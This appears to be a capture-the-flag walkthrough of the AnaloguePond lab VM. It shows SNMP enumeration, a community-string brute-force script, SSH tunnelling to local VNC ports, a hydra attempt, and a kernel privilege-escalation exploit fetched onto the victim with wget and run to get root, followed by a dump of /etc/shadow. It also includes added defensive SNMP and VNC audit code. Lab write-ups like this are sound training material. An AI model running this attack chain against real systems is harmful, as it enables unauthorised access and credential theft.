- AnaloguePond CTF Walkthrough - DigiP
- netdiscover
- 192.168.1.249 08:00:27:c0:69:94 6 360 PCS Systemtechnik GmbH
- nmap -sC -sV -T5 --open -v -p- --script vuln 192.168.1.249
- Discovered open port 22/tcp on 192.168.1.249
- 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
- #hosts file
- 127.0.0.1 analoguepond
- us -mU -Iv analoguepond:a -r 1000
- UDP open domain[ 53] from 208.67.222.222 ttl 56
- UDP open snmp[ 161] from 192.168.1.249 ttl 64
- EXTRABACON
- snmp-check -c public -v 2c 192.168.1.249
- snmp-check v1.9 - SNMP enumerator
- Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
- [+] Try to connect to 192.168.1.249:161 using SNMPv2c and community 'public'
- [*] System information:
- Host IP address : 192.168.1.249
- Hostname : analoguepond
- Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- Contact : Eric Burdon <eric@example.com>
- Location : There is a house in New Orleans they call it...
- Uptime snmp : 00:47:17.27
- Uptime system : 00:47:06.45
- System date : 2017-4-26 02:05:41.0
- [*] Network information:
- Default TTL : noSuchObject
- TCP segments received : noSuchObject
- TCP segments sent : noSuchObject
- TCP segments retrans : noSuchObject
- Input datagrams : noSuchObject
- Delivered datagrams : noSuchObject
- Output datagrams : noSuchObject
- [*] File system information:
- Index : noSuchObject
- Mount point : noSuchObject
- Access : noSuchObject
- Bootable : noSuchObject
- onesixtyone 192.168.1.249
- Scanning 1 hosts, 2 communities
- 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- Couldn't get onesixtyone to read multiple community strings from a file, so I made my own little script:
- #!/bin/bash
- # Usage: bash snmp-brute.sh <target IP>   (e.g. 192.168.1.249)
- # Runs snmp-check once per community string in the wordlist, pausing between tries.
- target="$1"
- [ -n "$target" ] || { echo "usage: $0 <target IP>" >&2; exit 1; }
- while read -r community
- do
-     snmp-check -c "$community" -v 2c -w "$target"
-     sleep 3
- done < /mnt/HDD2/wordlists/communitystrings.txt
- bash snmp-brute.sh 192.168.1.249
- The only one found was public (but that depends on your list and on what is configured on the server).
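Added example (not part of the original paste, and not the author's tooling): a small Python audit for the snmpd.conf settings that make a box this easy to enumerate, namely a default v1/v2c community reachable from the network with no source restriction, and free text in sysLocation/sysContact that every community holder can read (here it carried the password hint). Both config bodies are constructed; the community string and SNMPv3 passphrases in the hardened one are placeholders.

```python
"""Audit an snmpd.conf for the weaknesses that make SNMP enumeration pay off:
a guessable v1/v2c community, no source restriction, a non-loopback listener,
and sensitive text in sysLocation/sysContact. Added example; the sample
configs below are constructed, not copied from the CTF box."""

# Constructed "weak" config in the shape of what the SNMP enumeration showed.
WEAK_CONF = """\
# net-snmp style snmpd.conf (constructed sample)
agentAddress udp:161,udp6:[::1]:161
rocommunity public
sysLocation There is a house in New Orleans they call it...
sysContact Eric Burdon <eric@example.com>
"""

# Constructed hardened counterpart: loopback-only agent, a non-default community
# limited to one management host, and an SNMPv3 user with auth+priv.
# The community string and the v3 passphrases are placeholders.
HARDENED_CONF = """\
agentAddress udp:127.0.0.1:161
rocommunity CHANGE-ME-community 192.168.1.10
createUser mgmt SHA "CHANGE-ME-auth" AES "CHANGE-ME-priv"
rouser mgmt priv
sysLocation DC1 rack 4
"""

DEFAULT_COMMUNITIES = {"public", "private", "manager", "cisco", "admin"}
LOOPBACK = ("127.0.0.1", "[::1]")


def audit_snmpd_conf(text):
    """Return [(severity, message), ...] for one snmpd.conf body."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        key, args = parts[0].lower(), parts[1:]

        if key == "agentaddress":
            # Every listener not bound to loopback is reachable from the LAN.
            for endpoint in (args[0].split(",") if args else []):
                if not any(lb in endpoint for lb in LOOPBACK):
                    findings.append(("medium", f"agent listens on non-loopback endpoint {endpoint}"))
            continue

        if key in ("syslocation", "syscontact"):
            # v1/v2c communities travel in cleartext, so whoever knows one reads these.
            findings.append(("info", f"{parts[0]} is readable by any community holder: {' '.join(args)}"))
            continue

        if key in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            community = args[0] if args else ""
            source = args[1] if len(args) > 1 else "default"
        elif key == "com2sec":                        # com2sec NAME SOURCE COMMUNITY
            community = args[2] if len(args) > 2 else ""
            source = args[1] if len(args) > 1 else "default"
        else:
            continue                                  # v3 users and the rest are left alone

        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append(("high", f"{parts[0]} uses default/guessable community '{community}'"))
        if key.startswith("rw"):
            findings.append(("high", f"{parts[0]} grants SNMP write access with '{community}'"))
        if source == "default":
            findings.append(("medium", f"{parts[0]} '{community}' accepted from any source address"))
    return findings


def worst_severity(findings):
    """Highest severity present, or 'none' for an empty finding list."""
    order = {"info": 0, "medium": 1, "high": 2}
    return max((s for s, _ in findings), key=order.get, default="none")


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label}: worst={worst_severity(audit_snmpd_conf(conf))}")
        for sev, msg in audit_snmpd_conf(conf):
            print(f"  [{sev}] {msg}")
```

Run it against a real /etc/snmp/snmpd.conf by passing the file contents to audit_snmpd_conf; the weak sample comes back with one "high" (the public community) and two "medium" findings, the hardened one with nothing above "info".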
- snmpwalk -v 2c -c public 192.168.1.249
- iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
- iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
- iso.3.6.1.2.1.1.3.0 = Timeticks: (622728) 1:43:47.28
- iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
- iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
- iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
- iso.3.6.1.2.1.1.7.0 = INTEGER: 72
- iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
- iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
- iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
- iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
- iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
- iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
- iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
- iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
- iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
- iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
- iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
- iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
- iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
- iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
- iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
- iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
- iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
- iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
- iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
- iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
- iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.25.1.1.0 = Timeticks: (623811) 1:43:58.11
- iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 1A 03 02 16 00 2B 01 00
- iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
- iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
- "
- iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
- iso.3.6.1.2.1.25.1.6.0 = Gauge32: 48
- iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
- iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
- Location : There is a house in New Orleans they call it...
- sshpass -f <(printf '%s\n' therisingsun) ssh eric@analoguepond
- Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 03:06:56 BST 2017
- System load: 0.04 Processes: 81
- Usage of /: 82.3% of 5.39GB Users logged in: 0
- Memory usage: 35% IP address for eth0: 192.168.1.249
- Swap usage: 0% IP address for virbr0: 192.168.122.1
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- eric@analoguepond:~$
- eric@analoguepond:~$ cat /etc/*ele* /etc/issue;uname -a
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
- NAME="Ubuntu"
- VERSION="14.04.5 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.5 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- Ubuntu 14.04.5 LTS
- My IP: 192.168.1.249
- Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
- eric@analoguepond:~$
- eric@analoguepond:~$ ls -lashR
- .:
- total 68K
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 13 21:11 ..
- 4.0K -rw------- 1 eric eric 47 Apr 26 03:07 .bash_history
- 4.0K -rw-r--r-- 1 eric eric 220 Dec 13 21:11 .bash_logout
- 4.0K -rw-r--r-- 1 eric eric 3.6K Dec 13 21:11 .bashrc
- 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .cache
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .dbus
- 4.0K -rw-r--r-- 1 eric eric 675 Dec 13 21:11 .profile
- 32K -rw-rw-r-- 1 eric eric 29K Dec 18 15:44 reticulatingsplines.gif
- 4.0K -rw------- 1 eric eric 711 Jan 7 18:32 .viminfo
- ./.cache:
- total 8.0K
- 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
- 0 -rw-r--r-- 1 eric eric 0 Jan 7 18:32 motd.legal-displayed
- ./.dbus:
- total 12K
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
- 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 session-bus
- ./.dbus/session-bus:
- total 16K
- 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 .
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 ..
- 4.0K -rw-rw-r-- 1 eric eric 476 Jan 7 16:44 1e9afac86f8648627311d32c585063c8-10
- 4.0K -rw-rw-r-- 1 eric eric 476 Dec 22 20:40 1e9afac86f8648627311d32c585063c8-11
- eric@analoguepond:~$
- eric@analoguepond:~$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- libuuid:x:100:101::/var/lib/libuuid:
- syslog:x:101:104::/home/syslog:/bin/false
- messagebus:x:102:107::/var/run/dbus:/bin/false
- dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
- landscape:x:104:110::/var/lib/landscape:/bin/false
- sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
- libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
- libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
- eric:x:1000:1000:Eric Burdon,,,:/home/eric:/bin/bash
- colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
- snmp:x:109:116::/var/lib/snmp:/bin/false
- snmptt:x:110:117:SNMP Trap Translator,,,:/var/spool/snmptt:/bin/false
- eric@analoguepond:~$ cat /etc/group
- root:x:0:
- daemon:x:1:
- bin:x:2:
- sys:x:3:
- adm:x:4:syslog,eric
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:eric
- floppy:x:25:
- tape:x:26:
- sudo:x:27:
- audio:x:29:
- dip:x:30:eric
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:
- sasl:x:45:
- plugdev:x:46:eric
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- libuuid:x:101:
- netdev:x:102:
- crontab:x:103:
- syslog:x:104:
- fuse:x:105:
- kvm:x:106:
- messagebus:x:107:
- mlocate:x:108:
- ssh:x:109:
- landscape:x:110:
- libvirtd:x:111:eric
- eric:x:1000:
- lpadmin:x:112:eric
- sambashare:x:113:eric
- scanner:x:114:
- colord:x:115:
- snmp:x:116:
- snmptt:x:117:
- eric@analoguepond:/var/log$ netstat -antplu
- (No info could be read for "-p": geteuid()=1000 but you should be root.)
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
- tcp 0 36 192.168.1.249:22 192.168.1.66:52778 ESTABLISHED -
- tcp6 0 0 :::22 :::* LISTEN -
- udp 0 0 0.0.0.0:42984 0.0.0.0:* -
- udp 0 0 192.168.122.1:53 0.0.0.0:* -
- udp 0 0 0.0.0.0:67 0.0.0.0:* -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 6336 0 0.0.0.0:41040 0.0.0.0:* -
- udp 0 0 0.0.0.0:161 0.0.0.0:* -
- udp6 0 0 ::1:161 :::* -
- udp6 0 0 :::39304 :::* -
- eric@analoguepond:/var/log$
- eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5901
- Connection to 127.0.0.1 5901 port [tcp/*] succeeded!
- RFB 003.008
- ^C
- eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5900
- Connection to 127.0.0.1 5900 port [tcp/*] succeeded!
- RFB 003.008
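The banner both nc probes returned is the RFB ProtocolVersion message, and the next thing a 3.7+ server sends is its list of security types, which is how you tell a password-protected VNC desktop from one that accepts anyone. Added example (not from the original paste): a parser for those two messages per RFC 6143, with version negotiation the way a client is required to do it. The sample bytes are constructed to match what was seen on 127.0.0.1:5901.

```python
"""Parse the first two messages of the RFB (VNC) handshake: the 12-byte
ProtocolVersion banner and, for 3.7+, the server's security-types list
(RFC 6143 sections 7.1.1 and 7.1.2). Added example; sample bytes are constructed."""
import re

VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")
CLIENT_MAX = (3, 8)

# Security type numbers from RFC 6143 section 7.1.2 and the IANA registry.
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  5: "RA2", 6: "RA2ne", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_protocol_version(banner: bytes):
    """Return (major, minor) from a ProtocolVersion message, else raise ValueError."""
    if len(banner) != 12:
        raise ValueError(f"ProtocolVersion must be 12 bytes, got {len(banner)}")
    m = VERSION_RE.match(banner)
    if not m:
        raise ValueError(f"not an RFB banner: {banner!r}")
    return int(m.group(1)), int(m.group(2))


def choose_client_version(server_banner: bytes, client_max=CLIENT_MAX):
    """Pick the version a client answers with: the server's version capped at
    the client's own. RFC 6143 says 3.4-3.6 (and anything else odd) behave
    as 3.3, since only 3.7 and 3.8 use the newer handshake."""
    server = parse_protocol_version(server_banner)
    if server[0] != 3:
        raise ValueError(f"unsupported major version {server[0]}")
    chosen = min(server, client_max)
    if chosen < (3, 7):
        chosen = (3, 3)
    return chosen, b"RFB %03d.%03d\n" % chosen


def parse_security_types(msg: bytes):
    """Parse the 3.7+ security-types message: a count byte then one byte per
    type. A count of 0 means the server refused and a reason string follows."""
    if not msg:
        raise ValueError("empty security-types message")
    count = msg[0]
    if count == 0:
        reason_len = int.from_bytes(msg[1:5], "big")
        raise ConnectionRefusedError(msg[5:5 + reason_len].decode("utf-8", "replace"))
    types = list(msg[1:1 + count])
    if len(types) != count:
        raise ValueError("truncated security-types message")
    return [(t, SECURITY_TYPES.get(t, f"unknown({t})")) for t in types]


def requires_authentication(types):
    """False if the server offers type 1 (None): a desktop anyone can attach to."""
    return all(t != 1 for t, _ in types)


if __name__ == "__main__":
    # Constructed exchange: banner as seen on 127.0.0.1:5901, then a server
    # offering only VNC Authentication (type 2), which matches the
    # "Performing standard VNC authentication" line vncviewer printed.
    version, reply = choose_client_version(b"RFB 003.008\n")
    offered = parse_security_types(b"\x01\x02")
    print(version, reply, offered, "auth required:", requires_authentication(offered))
```

Because the banner and the security-type list go out before any authentication, an exposed VNC port tells anyone on the network its version and whether it has a password at all, which is why binding the QEMU VNC listeners to 127.0.0.1 (as this box does) matters.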
- ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
- ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
- We set up our forwarders to the remote system; a local netstat shows the two listeners. We can now try vncviewer:
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1405/ssh
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1319/ssh
- vncviewer 127.0.0.1:5901
- Connected to RFB server, using protocol version 3.8
- Performing standard VNC authentication
- Password:
- Authentication failed
- However, we don't yet know the password.
- hydra -L /mnt/HDD2/ctf/analouge-pond/risingsun.txt -t vnc 127.0.0.1:5901
- It won't connect... XD
- ssh -f -N -D 7070 eric@192.168.1.249
- proxychains nmap -sS -n -PN -p- 127.0.0.1
- ProxyChains-3.1 (http://proxychains.sf.net)
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:51 EDT
- Nmap scan report for 127.0.0.1
- Host is up (0.0000040s latency).
- Not shown: 65531 closed ports
- PORT STATE SERVICE
- 111/tcp open rpcbind
- 5900/tcp open vnc
- 5901/tcp open vnc-1
- 7070/tcp open realserver
- Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
- nmap -sC -sV -T5 --open --script vuln -PN -p- 127.0.0.1
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:58 EDT
- Pre-scan script results:
- | broadcast-avahi-dos:
- | Discovered hosts:
- | 224.0.0.251
- | After NULL UDP avahi packet DoS (CVE-2011-1002).
- |_ Hosts are all up (not vulnerable).
- Nmap scan report for localhost (127.0.0.1)
- Host is up (0.0000030s latency).
- Not shown: 65531 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE VERSION
- 111/tcp open rpcbind 2-4 (RPC #100000)
- | rpcinfo:
- | program version port/proto service
- | 100000 2,3,4 111/tcp rpcbind
- |_ 100000 2,3,4 111/udp rpcbind
- 5900/tcp open vnc VNC (protocol 3.8)
- |_sslv2-drown:
- 5901/tcp open vnc VNC (protocol 3.8)
- |_sslv2-drown:
- 7070/tcp open realserver?
- searchsploit Ubuntu 14.04
- Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1) | linux/local/39166.c
- We compile this locally, copy to /var/www/html and start apache2. On the victim machine, we wget the file, chmod +x, and then run it. We are now root!
- root@analoguepond:~# id
- uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
- root@analoguepond:~#
- root@analoguepond:~# cat /etc/shadow
- root:!:17148:0:99999:7:::
- daemon:*:16652:0:99999:7:::
- bin:*:16652:0:99999:7:::
- sys:*:16652:0:99999:7:::
- sync:*:16652:0:99999:7:::
- games:*:16652:0:99999:7:::
- man:*:16652:0:99999:7:::
- lp:*:16652:0:99999:7:::
- mail:*:16652:0:99999:7:::
- news:*:16652:0:99999:7:::
- uucp:*:16652:0:99999:7:::
- proxy:*:16652:0:99999:7:::
- www-data:*:16652:0:99999:7:::
- backup:*:16652:0:99999:7:::
- list:*:16652:0:99999:7:::
- irc:*:16652:0:99999:7:::
- gnats:*:16652:0:99999:7:::
- nobody:*:16652:0:99999:7:::
- libuuid:!:16652:0:99999:7:::
- syslog:*:16652:0:99999:7:::
- messagebus:*:17148:0:99999:7:::
- dnsmasq:*:17148:0:99999:7:::
- landscape:*:17148:0:99999:7:::
- sshd:*:17148:0:99999:7:::
- libvirt-qemu:!:17148:0:99999:7:::
- libvirt-dnsmasq:!:17148:0:99999:7:::
- eric:$6$7RkXSEhf$RhH8uZkqDOnejEuCmrCo0VBEdYKWP050O.ArVW4uGxmf0ovnNbLWqKWL5iB2yT0d0GoDvkb5chjQX79pa.tcy0:17148:0:99999:7:::
- colord:*:17149:0:99999:7:::
- snmp:*:17152:0:99999:7:::
- snmptt:*:17152:0:99999:7:::
- root@analoguepond:~#
- root, as of now, has no password, so SSH won't help us. We could set one, but it doesn't seem like we're going to need to, since the main task is not to gain root but to complete the list of tasks the OP has set up for us in this CTF.
- The VNC servers must have their passwords stored locally. Hopefully we can find and read them now that we are root, or change them, to complete our tasks.
- root@analoguepond:~# cd /root
- root@analoguepond:/root# ls -lashR
- .:
- total 20K
- 4.0K drwx------ 2 root root 4.0K Jan 7 18:36 .
- 4.0K drwxr-xr-x 22 root root 4.0K Jan 7 18:42 ..
- 4.0K -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
- 4.0K -rw------- 1 root root 237 Dec 17 09:38 flag.txt
- 4.0K -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
- root@analoguepond:/root# cat flag.txt
- C'Mon Man! Y'all didn't think this was the final flag so soon...?
- Did the bright lights and big city knock you out...? If you pull
- a stunt like this again, I'll send you back to Walker...
- This is obviously troll flah #1 So keep going.
- root@analoguepond:/root#
- 2017-04-25 20:18:04.650+0000: starting up
- LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name barringsbank -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 6cf27edd-7559-d6eb-1502-d3135c807785 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/barringsbank.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=c,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/barringsbank-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:6d:93:6a,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
- char device redirected to /dev/pts/0 (label charserial0)
- /var/log/libvirt/qemu/barringsbank.log (END)
- 2017-04-25 20:18:05.470+0000: starting up
- LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name puppet -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 3561f84c-71c3-f16f-4a7b-9097e7d2ac39 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/puppet.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=dc,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/puppet-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:5b:05:f7,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:1,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x4
- char device redirected to /dev/pts/6 (label charserial0)
- root@analoguepond:/var/run# ifconfig
- eth0 Link encap:Ethernet HWaddr 08:00:27:c0:69:94
- inet addr:192.168.1.249 Bcast:192.168.1.255 Mask:255.255.255.0
- inet6 addr: fe80::a00:27ff:fec0:6994/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:604576 errors:0 dropped:0 overruns:0 frame:0
- TX packets:436808 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:45181046 (45.1 MB) TX bytes:34323377 (34.3 MB)
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- RX packets:7669 errors:0 dropped:0 overruns:0 frame:0
- TX packets:7669 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:376210 (376.2 KB) TX bytes:376210 (376.2 KB)
- virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
- inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:812 errors:0 dropped:0 overruns:0 frame:0
- TX packets:796 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:47884 (47.8 KB) TX bytes:70860 (70.8 KB)
- vnet0 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a
